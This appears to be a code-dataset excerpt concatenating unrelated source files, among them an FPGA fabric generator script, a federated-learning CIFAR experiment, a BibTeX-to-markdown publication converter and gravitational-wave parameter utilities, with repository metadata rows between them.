GenerateTileVerilog(TileInformation,str(tile),TileFileHandler)
TileFileHandler.close()
if ('-GenFabricHDL'.lower() in str(sys.argv).lower()) or ('-run_all'.lower() in str(sys.argv).lower()):
print('### Generate the Fabric VHDL descriptions')
FileHandler = open('fabric.vhdl','w+')
GenerateFabricVHDL(FabricFile,FileHandler)
FileHandler.close()
if ('-GenFabricVerilog'.lower() in str(sys.argv).lower()) or ('-run_all'.lower() in str(sys.argv).lower()):
print('### Generate the Fabric Verilog descriptions')
FileHandler = open('fabric.v','w+')
fabric_top = GenerateFabricVerilog(FabricFile,FileHandler)
FileHandler.close()
#w = open('eFPGA_top.v', "w+")
#w.write(fabric_top)
#w.close()
if ('-CSV2list'.lower() in str(sys.argv).lower()) or ('-AddList2CSV'.lower() in str(sys.argv).lower()):
arguments = re.split(' ',str(sys.argv))
# index was not working...
i = 0
for item in arguments:
# print('debug',item)
if re.search('-CSV2list', arguments[i], flags=re.IGNORECASE) or re.search('-AddList2CSV', arguments[i], flags=re.IGNORECASE):
break
i += 1
if arguments[i+2] == '':
raise ValueError('\nError: -CSV2list and -AddList2CSV expect two file names\n')
# stupid python adds quotes ' ' around the file name and a ',' -- bizarre
substitutions = {",": "", "\'": "", "\]": "", "\[": ""}
# InFileName = (replace(arguments[i+1], substitutions))
# don't ask me why I have to delete the stupid '['...; but at least works now
InFileName = re.sub('\]','',re.sub('\'','',(replace(arguments[i+1], substitutions))))
OutFileName = re.sub('\]','',re.sub('\'','',(replace(arguments[i+2], substitutions))))
if ('-CSV2list'.lower() in str(sys.argv).lower()):
CSV2list(InFileName, OutFileName)
if ('-AddList2CSV'.lower() in str(sys.argv).lower()):
list2CSV(InFileName, OutFileName)
if ('-PrintCSV_FileInfo'.lower() in str(sys.argv).lower()) :
arguments = re.split(' ',str(sys.argv))
# index was not working...
i = 0
for item in arguments:
# print('debug',item)
if re.search('-PrintCSV_FileInfo', arguments[i], flags=re.IGNORECASE):
break
i += 1
if arguments[i+1] == '':
		raise ValueError('\nError: -PrintCSV_FileInfo expects a file name\n')
# stupid python adds quotes ' ' around the file name and a ',' -- bizarre
substitutions = {",": "", "\'": "", "\]": "", "\[": ""}
# InFileName = (replace(arguments[i+1], substitutions))
# don't ask me why I have to delete the stupid '['...; but at least works now
InFileName = re.sub('\]','',re.sub('\'','',(replace(arguments[i+1], substitutions))))
if ('-PrintCSV_FileInfo'.lower() in str(sys.argv).lower()):
PrintCSV_FileInfo(InFileName)
if ('-GenNextpnrModel'.lower() in str(sys.argv).lower()) :
arguments = re.split(' ',str(sys.argv))
fabricObject = genFabricObject(fabric)
pipFile = open("npnroutput/pips.txt","w")
belFile = open("npnroutput/bel.txt", "w")
#pairFile = open("npnroutput/wirePairs.csv", "w")
templateFile = open("npnroutput/template.v", "w")
constraintFile = open("npnroutput/template.pcf", "w")
npnrModel = genNextpnrModel(fabricObject, False)
pipFile.write(npnrModel[0])
belFile.write(npnrModel[1])
templateFile.write(npnrModel[2])
constraintFile.write(npnrModel[3])
#pairFile.write(npnrModel[4])
pipFile.close()
belFile.close()
templateFile.close()
constraintFile.close()
#pairFile.close()
if ('-GenNextpnrModel_pair'.lower() in str(sys.argv).lower()) :
arguments = re.split(' ',str(sys.argv))
fabricObject = genFabricObject(fabric)
pipFile = open("npnroutput/pips.txt","w")
belFile = open("npnroutput/bel.txt", "w")
pairFile = open("npnroutput/wirePairs.csv", "w")
templateFile = open("npnroutput/template.v", "w")
constraintFile = open("npnroutput/template.pcf", "w")
npnrModel = genNextpnrModel(fabricObject)
pipFile.write(npnrModel[0])
belFile.write(npnrModel[1])
templateFile.write(npnrModel[2])
constraintFile.write(npnrModel[3])
pairFile.write(npnrModel[4])
pipFile.close()
belFile.close()
templateFile.close()
constraintFile.close()
pairFile.close()
if ('-GenBitstreamSpec'.lower() in str(sys.argv).lower()) :
arguments = re.split(' ',str(sys.argv))
# index was not working...
i = 0
for item in arguments:
# print('debug',item)
if re.search('-genBitstreamSpec', arguments[i], flags=re.IGNORECASE):
break
i += 1
if arguments[i+1] == '':
		raise ValueError('\nError: -genBitstreamSpec expects an output file name\n')
substitutions = {",": "", "\'": "", "\]": "", "\[": ""}
OutFileName = re.sub('\]','',re.sub('\'','',(replace(arguments[i+1], substitutions))))
print(arguments)
fabricObject = genFabricObject(fabric)
bitstreamSpecFile = open(OutFileName, "wb")
specObject = genBitstreamSpec(fabricObject)
pickle.dump(specObject, bitstreamSpecFile)
bitstreamSpecFile.close()
w = csv.writer(open(OutFileName.replace("txt","csv"), "w"))
for key1 in specObject["TileSpecs"]:
w.writerow([key1])
for key2, val in specObject["TileSpecs"][key1].items():
w.writerow([key2,val])
if ('-help'.lower() in str(sys.argv).lower()) or ('-h' in str(sys.argv).lower()):
print('')
print('Options/Switches')
print(' -GenTileSwitchMatrixCSV - generate initial switch matrix template (has to be bootstrapped first)')
print(' -GenTileSwitchMatrixVHDL - generate initial switch matrix VHDL code')
print(' -GenTileHDL - generate all tile VHDL descriptions')
print(' -run_all - run the 3 previous steps in one go (more for debug)')
print(' -CSV2list in.csv out.list - translate a switch matrix adjacency matrix into a list (beg_port,end_port)')
	print(' -AddList2CSV in.list out.csv - adds connections from a list (beg_port,end_port) to a switch matrix adjacency matrix')
	print(' -PrintCSV_FileInfo foo.csv - prints input and output ports in csv switch matrix files')
print(' -genNextpnrModel - generates a model for nextpnr in the npnroutput directory')
print(' -genNextpnrModel_pair - generates a model for nextpnr in the npnroutput directory and wirePairs')
print(' -genBitstreamSpec meta_data.txt - generates a bitstream spec for fasm parsing ')
print(' -genBitstream template.fasm meta_data.txt bitstream.txt - generates a bitstream - the first file is the fasm file, the second is the bitstream spec and the third is the fasm file to write to')
print('')
print('Steps to use this script to produce an FPGA fabric:')
print(' 1) create/modify a fabric description (see fabric.csv as an example)')
print(' 2) create BEL primitives as VHDL code. ')
print(' Use std_logic (not std_logic_vector) ports')
print(' Follow the example in clb_slice_4xLUT4.vhdl')
print(' Only one entity allowed in the file!')
print(' If you use further components, they go into extra files.')
print(' The file name and the entity should match.')
print(' Ensure the top-level BEL VHDL-file is in your fabric description.')
print(' 3) run the script with the -GenTileSwitchMatrixCSV switch ')
print(' This will eventually overwrite all old switch matrix csv-files!!!')
print(' 4) Edit the switch matrix adjacency (the switch matrix csv-files).')
print(' 5) run the script with the -GenTileSwitchMatrixVHDL switch ')
print(' This will generate switch matrix VHDL files')
print(' 6) run the script with the -GenTileHDL switch ')
print(' This will generate all tile VHDL files')
print(' Note that the only manual VHDL code is implemented in 2) the rest is autogenerated!')
CLB = GetTileFromFile(FabricFile,'CLB')
# Inputs, Outputs = GetComponentPortsFromFile('clb_slice_4xLUT4.vhdl')
# print('GetComponentPortsFromFile Inputs:\n',Inputs,'\nOutputs\n',Outputs)
# Inputs, Outputs = GetTileComponentPorts(CLB, 'SwitchMatrix')
# print('GetTileComponentPorts SwitchMatrix Inputs:\n',Inputs,'\nOutputs\n',Outputs)
# Inputs, Outputs = GetTileComponentPorts(CLB, 'SwitchMatrixIndexed')
# print('GetTileComponentPorts SwitchMatrixIndexed Inputs:\n',Inputs,'\nOutputs\n',Outputs)
# Inputs, Outputs = GetTileComponentPorts(CLB, 'all')
# print('GetTileComponentPorts all Inputs:\n',Inputs,'\nOutputs\n',Outputs)
# Inputs, Outputs = GetTileComponentPorts(CLB, 'allIndexed')
# print('GetTileComponentPorts all Inputs:\n',Inputs,'\nOutputs\n',Outputs)
# print('####################################################################################')
# Inputs, Outputs = GetTileComponentPortsVectors(CLB, 'SwitchMatrix')
# print('GetTileComponentPorts SwitchMatrix Inputs:\n',Inputs,'\nOutputs\n',Outputs)
# Inputs, Outputs = GetTileComponentPortsVectors(CLB, 'SwitchMatrixIndexed')
# print('GetTileComponentPorts SwitchMatrixIndexed Inputs:\n',Inputs,'\nOutputs\n',Outputs)
# Inputs, Outputs = GetTileComponentPortsVectors(CLB, 'all')
# print('GetTileComponentPorts all Inputs:\n',Inputs,'\nOutputs\n',Outputs)
# Inputs, Outputs = GetTileComponentPortsVectors(CLB, 'allIndexed')
# print('GetTileComponentPorts all Inputs:\n',Inputs,'\nOutputs\n',Outputs)
# for i in range(1,10):
# print('test',i,' log ',int(math.ceil(math.log2(i))))
# print('CLB tile: \n')
# for item in CLB:
# print(item,'\n')
# CellTypes = GetCellTypes(fabric)
# print('myout: ',CellTypes)
# print('x_tiles ',x_tiles,' y_tiles ',y_tiles)
# print('fabric: \n')
# for item in fabric:
# print(item,'\n')
| 57.851236 | 325 | 0.580427 |
4a1f4a354a2c9e1022c4e8d15291c537fd1e1e6d | 741 | py | Python | Company-Based/roblox/word_compression.py | saisankargochhayat/algo_quest | a24f9a22c019ab31d56bd5a7ca5ba790d54ce5dc | [
"Apache-2.0"
] | 3 | 2017-02-15T20:55:04.000Z | 2018-09-26T18:48:24.000Z | Company-Based/roblox/word_compression.py | saisankargochhayat/algo_quest | a24f9a22c019ab31d56bd5a7ca5ba790d54ce5dc | [
"Apache-2.0"
] | 4 | 2017-10-07T18:59:20.000Z | 2019-10-08T05:43:25.000Z | Company-Based/roblox/word_compression.py | saisankargochhayat/algo_quest | a24f9a22c019ab31d56bd5a7ca5ba790d54ce5dc | [
"Apache-2.0"
] | 1 | 2017-10-08T06:52:21.000Z | 2017-10-08T06:52:21.000Z | def compressWord(word: str, k: int):
    # Let's define a stack to maintain the stream of letters.
from collections import deque
stck = deque([])
for c in word:
if stck:
old_c, val = stck[-1]
if old_c == c:
stck.append((c, val+1))
else:
stck.append((c, 1))
else:
stck.append((c, 1))
# Now we check if top element has been repeated k times and remove it.
old_c, val = stck[-1]
if val == k:
# Remove k elements
for i in range(k):
stck.pop()
cArray = [c for c, v in stck]
return ''.join(cArray)
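# Hand-traced example: compressWord("abbcccb", 3) returns "a" (the run of three c's is removed,
# after which the trailing b completes a run of three b's that is removed as well), while
# compressWord("aba", 2) returns "aba" since no k equal letters ever become adjacent.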
# print(compressWord("abbcccb", 3))
print(compressWord("aba", 2)) | 28.5 | 79 | 0.503374 |
4a1f4ad85d8a7552854d8f3d4e6153edac9f280c | 230 | py | Python | docs/en/doclanguage.py | babab/DisPass | 9563ddeef60fc580ce13fa3bfdedea56225ea099 | [
"0BSD"
] | 3 | 2015-02-03T05:49:40.000Z | 2016-06-24T01:44:38.000Z | sphinx-doc/en/doclanguage.py | ryuslash/DisPass | d19962377457b4106355fa236d2cc8e0b039ad9f | [
"0BSD"
] | 56 | 2016-01-25T17:44:15.000Z | 2018-11-02T18:05:51.000Z | sphinx-doc/en/doclanguage.py | ryuslash/DisPass | d19962377457b4106355fa236d2cc8e0b039ad9f | [
"0BSD"
] | 1 | 2016-01-25T17:58:53.000Z | 2016-01-25T17:58:53.000Z | import sys
import os
# Import from dispass for versionStr
sys.path.insert(0, os.path.abspath('../../'))
from dispass import dispass
# language specific settings
language = 'en'
html_title = dispass.versionStr + ' documentation'
| 20.909091 | 50 | 0.747826 |
4a1f4b1b147fbc2000308981fa1cc1cc5b58f87b | 759 | py | Python | Gds/src/fprime_gds/common/templates/data_template.py | chrisdonlan/fprime | 0cab90e238cff1b50c20f1e148a44cf8827a5bf8 | [
"Apache-2.0"
] | 5 | 2019-10-22T03:41:02.000Z | 2022-01-16T12:48:31.000Z | Gds/src/fprime_gds/common/templates/data_template.py | chrisdonlan/fprime | 0cab90e238cff1b50c20f1e148a44cf8827a5bf8 | [
"Apache-2.0"
] | 27 | 2019-02-07T17:58:58.000Z | 2019-08-13T00:46:24.000Z | Gds/src/fprime_gds/common/templates/data_template.py | chrisdonlan/fprime | 0cab90e238cff1b50c20f1e148a44cf8827a5bf8 | [
"Apache-2.0"
] | 3 | 2019-01-01T18:44:37.000Z | 2019-08-01T01:19:39.000Z | '''
@brief Base data template class.
Data templates are classes whose instances describe a specific class of data
items. For example, a data template instance could describe the AF_ASSERT_0
event or the channel FR_CycleTime.
@date Created July 2, 2018
@author R. Joseph Paetz
@bug No known bugs
'''
class DataTemplate(object):
'''Base class for all data template classes'''
def __init__(self):
'''
Constructor.
The only required fields for template classes are id and name
Returns:
Initialized Template object
'''
# Initialize at least id and name here
pass
def get_id(self):
raise NotImplementedError
def get_name(self):
raise NotImplementedError
| 21.083333 | 76 | 0.673254 |
4a1f4b8dc8d39737a2eda189d554f89df95b8697 | 6,413 | py | Python | markdown_generator/pubsFromBib.py | ThomasDeb/ThomasDeb.github.io | 646689b0dd92244999c5acea1bb0d7faead97b52 | [
"MIT"
] | null | null | null | markdown_generator/pubsFromBib.py | ThomasDeb/ThomasDeb.github.io | 646689b0dd92244999c5acea1bb0d7faead97b52 | [
"MIT"
] | null | null | null | markdown_generator/pubsFromBib.py | ThomasDeb/ThomasDeb.github.io | 646689b0dd92244999c5acea1bb0d7faead97b52 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
# # Publications markdown generator for academicpages
#
# Takes a set of bibtex of publications and converts them for use with [academicpages.github.io](academicpages.github.io). This is an interactive Jupyter notebook ([see more info here](http://jupyter-notebook-beginner-guide.readthedocs.io/en/latest/what_is_jupyter.html)).
#
# The core python code is also in `pubsFromBibs.py`.
# Run either from the `markdown_generator` folder after replacing updating the publist dictionary with:
# * bib file names
# * specific venue keys based on your bib file preferences
# * any specific pre-text for specific files
# * Collection Name (future feature)
#
# TODO: Make this work with other databases of citations,
# TODO: Merge this with the existing TSV parsing solution
from pybtex.database.input import bibtex
import pybtex.database.input.bibtex
from time import strptime
import string
import html
import os
import re
#todo: incorporate different collection types rather than a catch all publications, requires other changes to template
publist = {
"preprints": {
"file": "preprints.bib",
"venuekey": "journal",
"venue-pretext": "",
"collection": {"name": "publications",
"permalink": "/publications/"}
},
"proceedings": {
"file" : "proceedings.bib",
"venuekey": "booktitle",
"venue-pretext": "",
"collection" : {"name":"publications",
"permalink":"/publications/"}
},
"journal":{
"file": "journal.bib",
"venuekey" : "journal",
"venue-pretext" : "",
"collection" : {"name":"publications",
"permalink":"/publications/"}
}
}
html_escape_table = {
    "&": "&amp;",
    '"': "&quot;",
    "'": "&apos;"
}
def html_escape(text):
"""Produce entities within text."""
s = "".join(html_escape_table.get(c, c) for c in text)
    s = s.replace("&amp;amp;", "&amp;")
    s = s.replace("&amp;quot;", "&quot;")
    s = s.replace("&amp;apos;", "&apos;")
return s
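# e.g. html_escape('Tom & "Jerry"') -> 'Tom &amp; &quot;Jerry&quot;'; input that already contains
# "&amp;" is collapsed back so it is not double-escaped.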
for pubsource in publist:
parser = bibtex.Parser()
bibdata = parser.parse_file(publist[pubsource]["file"])
#loop through the individual references in a given bibtex file
for bib_id in bibdata.entries:
#reset default date
pub_year = "1900"
pub_month = "01"
pub_day = "01"
b = bibdata.entries[bib_id].fields
try:
pub_year = f'{b["year"]}'
#todo: this hack for month and day needs some cleanup
if "month" in b.keys():
if(len(b["month"])<3):
pub_month = "0"+b["month"]
pub_month = pub_month[-2:]
elif(b["month"] not in range(12)):
tmnth = strptime(b["month"][:3],'%b').tm_mon
pub_month = "{:02d}".format(tmnth)
else:
pub_month = str(b["month"])
if "day" in b.keys():
pub_day = str(b["day"])
pub_date = pub_year+"-"+pub_month+"-"+pub_day
#strip out {} as needed (some bibtex entries that maintain formatting)
clean_title = b["title"].replace("{", "").replace("}","").replace("\\","").replace(" ","-")
url_slug = re.sub("\\[.*\\]|[^a-zA-Z0-9_-]", "", clean_title)
url_slug = url_slug.replace("--","-")
md_filename = (str(pub_date) + "-" + url_slug + ".md").replace("--","-")
html_filename = (str(pub_date) + "-" + url_slug).replace("--","-")
#Build Citation from text
citation = ""
#citation authors - todo - add highlighting for primary author?
for author in bibdata.entries[bib_id].persons["author"]:
citation = citation+" "+author.first_names[0]+" "+author.last_names[0]+", "
#citation title
citation = citation + "\"" + html_escape(b["title"].replace("{", "").replace("}","").replace("\\","")) + ".\""
#add venue logic depending on citation type
venue = publist[pubsource]["venue-pretext"]+b[publist[pubsource]["venuekey"]].replace("{", "").replace("}","").replace("\\","")
citation = citation + " " + '<i>' + html_escape(venue) + '</i>'
citation = citation + ", " + pub_year + "."
## YAML variables
md = "---\ntitle: \"" + html_escape(b["title"].replace("{", "").replace("}","").replace("\\","")) + '"\n'
md += """collection: """ + publist[pubsource]["collection"]["name"]
md += """\npermalink: """ + publist[pubsource]["collection"]["permalink"] + html_filename
md += """\ncategory: """ + pubsource
note = False
if "note" in b.keys():
if len(str(b["note"])) > 5:
md += "\nexcerpt: '" + html_escape(b["note"]) + "'"
note = True
md += "\ndate: " + str(pub_date)
md += "\nvenue: '" + html_escape(venue) + "'"
url = False
if "url" in b.keys():
if len(str(b["url"])) > 5:
md += "\npaperurl: '" + b["url"] + "'"
url = True
md += "\ncitation: '" + html_escape(citation) + "'"
md += "\n---"
## Markdown description for individual page
if note:
md += "\n" + html_escape(b["note"]) + "\n"
if url:
md += "\n[Access paper here](" + b["url"] + "){:target=\"_blank\"}\n"
else:
md += "\nUse [Google Scholar](https://scholar.google.com/scholar?q="+html.escape(clean_title.replace("-","+"))+"){:target=\"_blank\"} for full citation"
md_filename = os.path.basename(md_filename)
with open("../_publications/" + md_filename, 'w') as f:
f.write(md)
            print(f'SUCCESSFULLY PARSED {bib_id}: \"', b["title"][:60],"..."*(len(b['title'])>60),"\"")
# field may not exist for a reference
except KeyError as e:
print(f'WARNING Missing Expected Field {e} from entry {bib_id}: \"', b["title"][:30],"..."*(len(b['title'])>30),"\"")
continue
| 36.645714 | 273 | 0.51801 |
4a1f4bb0226765188e68e6fb59309d63a0e26ff2 | 5,969 | py | Python | Past_experiments/E12C4.py | abogdanova/FedMed | 72f238c31b6714c664e1b0e40204f9528f764182 | [
"MIT"
] | 5 | 2019-07-23T14:49:46.000Z | 2022-03-30T13:54:22.000Z | Past_experiments/E12C4.py | abogdanova/FedMed | 72f238c31b6714c664e1b0e40204f9528f764182 | [
"MIT"
] | null | null | null | Past_experiments/E12C4.py | abogdanova/FedMed | 72f238c31b6714c664e1b0e40204f9528f764182 | [
"MIT"
] | null | null | null | from __future__ import absolute_import, division, print_function
import collections
import numpy as np
from six.moves import range
import tensorflow as tf
import datetime
from tensorflow_federated import python as tff
from tensorflow.python.keras.optimizer_v2 import gradient_descent
from tensorflow.keras import layers
tf.compat.v1.enable_v2_behavior()
EXP_CODE = 'E12C4'
NUM_EXAMPLES_PER_USER = 2000
BATCH_SIZE = 32
USERS = 5
NUM_EPOCHS = 12
CLASSES = 10
WIDTH = 32
HEIGHT = 32
CHANNELS = 3
def mane():
""" Run program """
cifar_train, cifar_test = tf.keras.datasets.cifar10.load_data()
federated_train_data = [get_distributed(cifar_train, u, 'i') for u in range(USERS)]
(X_test, y_test) = get_non_distributed(cifar_test)
sample_batch = federated_train_data[1][-2]
non_federated_model = create_compiled_keras_model()
def model_fn():
keras_model = create_compiled_keras_model()
return tff.learning.from_compiled_keras_model(keras_model, sample_batch)
iterative_process = tff.learning.build_federated_averaging_process(model_fn)
evaluation = tff.learning.build_federated_evaluation(model_fn)
state = iterative_process.initialize()
fd_test_accuracy = []
fd_test_loss = []
fd_train_loss = []
for round_num in range(12):
selected = np.random.choice(5, 4, replace=False)
state, metrics = iterative_process.next(state, list(np.array(federated_train_data)[selected]))
non_federated_model.set_weights(state.model.trainable)
(loss, accuracy) = non_federated_model.evaluate(X_test, y_test)
fd_train_loss.append(metrics[1])
fd_test_accuracy.append(accuracy)
fd_test_loss.append(loss)
try:
with open('Log/Exp12/'+ EXP_CODE + '.txt', 'w') as log:
print(state.model.trainable, file=log)
except IOError:
print('File Error')
def get_indices_realistic(y, u):
# split dataset into arrays of each class label
all_indices = [i for i, d in enumerate(y)]
shares_arr = [4000, 2000, 2000, 1000, 1000]
user_indices = []
for u in range(USERS):
user_indices.append([all_indices.pop(0) for i in range(shares_arr[u])])
return user_indices
def get_indices_unbalanced(y):
# split dataset into arrays of each class label
indices_array = []
for c in range(CLASSES):
indices_array.append([i for i, d in enumerate(y) if d == c])
# each user will have 2 classes excluded from their data sets, thus 250 examples * remaining 8 classes
class_shares = 250
# store indices for future use
user_indices = []
# auxilary index array to pop out pairs of classes missing at each user
class_index = list(range(CLASSES))
for u in range(USERS):
columns_out = [class_index.pop(0) for i in range(2)]
selected_columns = set(range(CLASSES)) - set(columns_out)
starting_index = u*class_shares
user_indices.append(
np.array(indices_array)[list(selected_columns)].T[starting_index:starting_index + class_shares]
.flatten())
return user_indices
def get_indices_unbalanced_completely(y):
# split dataset into arrays of each class label
indices_array = []
for c in range(CLASSES):
indices_array.append([i for i, d in enumerate(y) if d == c])
class_shares = CLASSES // min(CLASSES, USERS)
user_indices = []
for u in range(USERS):
user_indices.append(
np.array(
[indices_array.pop(0)[:NUM_EXAMPLES_PER_USER//class_shares] for j in range(class_shares)])
.flatten())
return user_indices
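# With CLASSES=10 and USERS=5 this gives class_shares=2, so every client receives 1000 examples
# from each of 2 classes that no other client sees: a fully non-IID partition.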
def get_indices_even(y):
# split dataset into arrays of each class label
indices_array = []
for c in range(CLASSES):
indices_array.append([i for i, d in enumerate(y) if d == c])
user_indices = []
class_shares = NUM_EXAMPLES_PER_USER // CLASSES
# take even shares of each class for every user
for u in range(USERS):
starting_index = u*class_shares
user_indices.append(np.array(indices_array).T[starting_index:starting_index + class_shares].flatten())
return user_indices
def get_distributed(source, u, distribution):
if distribution == 'i':
indices = get_indices_even(source[1])[u]
elif distribution == 'n':
indices = get_indices_unbalanced(source[1])[u]
elif distribution == 'r':
indices = get_indices_realistic(source[1][:10000], u)[u]
else:
indices = get_indices_unbalanced_completely(source[1])[u]
output_sequence = []
for repeat in range(NUM_EPOCHS):
for i in range(0, len(indices), BATCH_SIZE):
batch_samples = indices[i:i + BATCH_SIZE]
output_sequence.append({
'x': np.array([source[0][b] / 255.0 for b in batch_samples], dtype=np.float32),
'y': np.array([source[1][b] for b in batch_samples], dtype=np.int32)})
return output_sequence
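# Each client's data is returned as a flat list of {'x': images scaled to [0, 1], 'y': integer
# labels} batches, repeated NUM_EPOCHS times; this is the per-client batch format that
# tff.learning consumes in mane() above.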
def get_non_distributed(source):
y = np.array(source[1][:10000], dtype=np.int32)
X = np.array(source[0][:10000], dtype=np.float32) / 255.0
return X, y
def create_compiled_keras_model():
model = tf.keras.models.Sequential([
tf.keras.layers.Conv2D(32,(3, 3),
activation="tanh",
padding="same",
input_shape=(WIDTH, HEIGHT, CHANNELS)),
tf.keras.layers.MaxPooling2D(pool_size=(2,2)),
tf.keras.layers.Conv2D(64, (3, 3), activation="tanh", padding="same"),
tf.keras.layers.MaxPooling2D(pool_size=(2,2)),
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(128, activation="tanh"),
tf.keras.layers.Dense(10, activation=tf.nn.softmax)])
def loss_fn(y_true, y_pred):
return tf.reduce_mean(tf.keras.losses.sparse_categorical_crossentropy(y_true, y_pred))
model.compile(loss=loss_fn, optimizer="adam", metrics=[tf.keras.metrics.SparseCategoricalAccuracy()])
return model
if __name__ == "__main__":
mane()
| 34.906433 | 113 | 0.681354 |
4a1f4bdffa14661370e4815c5eefb7172de1c50c | 5,996 | py | Python | agn_utils/bbh_population_generators/calculate_extra_bbh_parameters.py | avivajpeyi/agn_phenomenological_model | 94d2e39f43cb11986d0abcb33769ee1aa501ca85 | [
"MIT"
] | null | null | null | agn_utils/bbh_population_generators/calculate_extra_bbh_parameters.py | avivajpeyi/agn_phenomenological_model | 94d2e39f43cb11986d0abcb33769ee1aa501ca85 | [
"MIT"
] | null | null | null | agn_utils/bbh_population_generators/calculate_extra_bbh_parameters.py | avivajpeyi/agn_phenomenological_model | 94d2e39f43cb11986d0abcb33769ee1aa501ca85 | [
"MIT"
] | 1 | 2021-08-22T07:05:15.000Z | 2021-08-22T07:05:15.000Z | """
Module to help convert parameters to our AGN formalism
"""
import bilby
import lalsimulation
import numpy as np
from bilby.gw.conversion import (
component_masses_to_chirp_mass, total_mass_and_mass_ratio_to_component_masses,
chirp_mass_and_mass_ratio_to_total_mass, generate_all_bbh_parameters, generate_spin_parameters, generate_mass_parameters,
convert_to_lal_binary_black_hole_parameters, generate_mass_parameters, generate_component_spins
)
from bilby_pipe.gracedb import (
determine_duration_and_scale_factor_from_parameters,
)
from .spin_conversions import calculate_relative_spins_from_component_spins
from numpy import cos, sin
REFERENCE_FREQ = 20
def add_kick(df):
from bbh_simulator.calculate_kick_vel_from_samples import Samples
samples = Samples(posterior=df)
samples.calculate_remnant_kick_velocity()
return samples.posterior
def add_signal_duration(df):
df["chirp_mass"] = component_masses_to_chirp_mass(df['mass_1'], df['mass_2'])
duration, roq_scale_factor = np.vectorize(
determine_duration_and_scale_factor_from_parameters
)(chirp_mass=df["chirp_mass"])
df["duration"] = duration
long_signals = [
f"data{i}" for i in range(len(duration)) if duration[i] > 4
]
# print(f"long_signals= " + str(long_signals).replace("'", ""))
return df
def add_snr(df):
required_params = [
"dec",
"ra",
"theta_jn",
"geocent_time",
"luminosity_distance",
"psi",
"phase",
"mass_1",
"mass_2",
"a_1",
"a_2",
"tilt_1",
"tilt_2",
"phi_12",
"phi_jl",
]
df_cols = list(df.keys())
missing_params = set(required_params) - set(df_cols)
if len(missing_params) != 0:
raise ValueError(f"Params missing for SNR calculation: {missing_params}")
h1_snr, l1_snr, network_snr = _get_injection_snr(**df)
df["h1_snr"] = h1_snr
df["l1_snr"] = l1_snr
df["network_snr"] = network_snr
return df
@np.vectorize
def _get_injection_snr(
a_1,
a_2,
dec,
ra,
psi,
phi_12,
phase,
geocent_time,
mass_1,
mass_2,
luminosity_distance,
tilt_1,
tilt_2,
theta_jn,
phi_jl,
**kwargs,
):
"""
:returns H1 snr, L1 snr, network SNR
"""
injection_parameters = dict(
# location params
dec=dec,
ra=ra,
theta_jn=theta_jn,
luminosity_distance=luminosity_distance,
geocent_time=geocent_time,
# phase params
psi=psi,
phase=phase,
# mass params
mass_1=mass_1,
mass_2=mass_2,
# spin params
a_1=a_1,
a_2=a_2,
phi_12=phi_12,
tilt_1=tilt_1,
tilt_2=tilt_2,
phi_jl=phi_jl,
)
chirp_mass = bilby.gw.conversion.component_masses_to_chirp_mass(
mass_1, mass_2
)
duration, _ = determine_duration_and_scale_factor_from_parameters(
chirp_mass
)
sampling_frequency = 2048.0
waveform_generator = bilby.gw.WaveformGenerator(
duration=duration,
sampling_frequency=sampling_frequency,
frequency_domain_source_model=bilby.gw.source.lal_binary_black_hole,
parameter_conversion=bilby.gw.conversion.convert_to_lal_binary_black_hole_parameters,
waveform_arguments=dict(
waveform_approximant="IMRPhenomPv2",
reference_frequency=REFERENCE_FREQ,
minimum_frequency=20.0,
),
)
# Set up interferometers.
ifos = bilby.gw.detector.InterferometerList(["H1", "L1"])
ifos.set_strain_data_from_power_spectral_densities(
sampling_frequency=sampling_frequency,
duration=duration,
start_time=injection_parameters["geocent_time"] - 2,
)
ifos.inject_signal(
waveform_generator=waveform_generator, parameters=injection_parameters
)
snrs = [ifo.meta_data["optimal_SNR"] for ifo in ifos]
network_snr = np.sqrt(np.sum([i ** 2 for i in snrs]))
return snrs[0], snrs[1], network_snr
@np.vectorize
def get_chi_eff(s1z, s2z, q):
return (s1z + s2z * q) / (1 + q)
@np.vectorize
def get_chi_p(s1x, s1y, s2x, s2y, q):
chi1p = np.sqrt(s1x ** 2 + s1y ** 2)
chi2p = np.sqrt(s2x ** 2 + s2y ** 2)
qfactor = q * ((4 * q) + 3) / (4 + (3 * q))
return np.maximum(chi1p, chi2p * qfactor)
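# Illustrative sanity check for the two spin summaries above (values chosen
# here for demonstration only): for equal masses (q = 1), chi_eff is the mean
# of the aligned spin components and chi_p reduces to the larger in-plane
# spin magnitude.
#
#     get_chi_eff(s1z=0.3, s2z=0.5, q=1.0)                    # -> 0.4
#     get_chi_p(s1x=0.4, s1y=0.0, s2x=0.1, s2y=0.0, q=1.0)    # -> 0.4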
def get_component_mass_from_source_mass_and_z(m1_source, q, z):
m1 = m1_source * (1 + np.array(z))
m2 = m1 * q
return m1, m2
def get_component_mass_from_mchirp_q(mchirp, q):
mtot = chirp_mass_and_mass_ratio_to_total_mass(chirp_mass=mchirp, mass_ratio=q)
m1, m2 = total_mass_and_mass_ratio_to_component_masses(mass_ratio=q, total_mass=mtot)
return m1, m2
def scale_vector(scale, vector):
if len(scale.shape) > 0:
if scale.shape[0] == vector.shape[0]:
return np.array([m * v for m, v in zip(scale, vector)])
else:
v = scale * vector
v.shape = (3,1)
return v.T
def add_cos_theta_12_from_component_spins(s):
_, _, _, _, _, _, _, theta_12, _ = calculate_relative_spins_from_component_spins(s["spin_1x"], s["spin_1y"], s["spin_1z"], s["spin_2x"], s["spin_2y"], s["spin_2z"])
s['cos_theta_12'] = np.cos(theta_12)
return s
def process_samples(s, rf):
s['reference_frequency'] = rf
s, _ = convert_to_lal_binary_black_hole_parameters(s)
s = generate_mass_parameters(s)
s = generate_spin_parameters(s)
s = add_cos_theta_12_from_component_spins(s)
try:
s = add_snr(s)
s['snr'] = s['network_snr']
except Exception as e:
pass
return s
def result_post_processing(r:bilby.gw.result.CBCResult):
r.posterior = add_cos_theta_12_from_component_spins(r.posterior)
r.injection_parameters = process_samples(r.injection_parameters, r.reference_frequency)
return r
| 27.888372 | 168 | 0.653936 |
4a1f4c6be3b9c1f74fc1037c8b22db49e482779f | 1,984 | py | Python | docs/conf.py | tma15/bunruija | 64a5c993a06e9de75f8f382cc4b817f91965223f | [
"MIT"
] | 4 | 2020-12-22T11:12:35.000Z | 2021-12-15T13:30:02.000Z | docs/conf.py | tma15/bunruija | 64a5c993a06e9de75f8f382cc4b817f91965223f | [
"MIT"
] | 4 | 2021-01-16T07:34:22.000Z | 2021-08-14T06:56:07.000Z | docs/conf.py | tma15/bunruija | 64a5c993a06e9de75f8f382cc4b817f91965223f | [
"MIT"
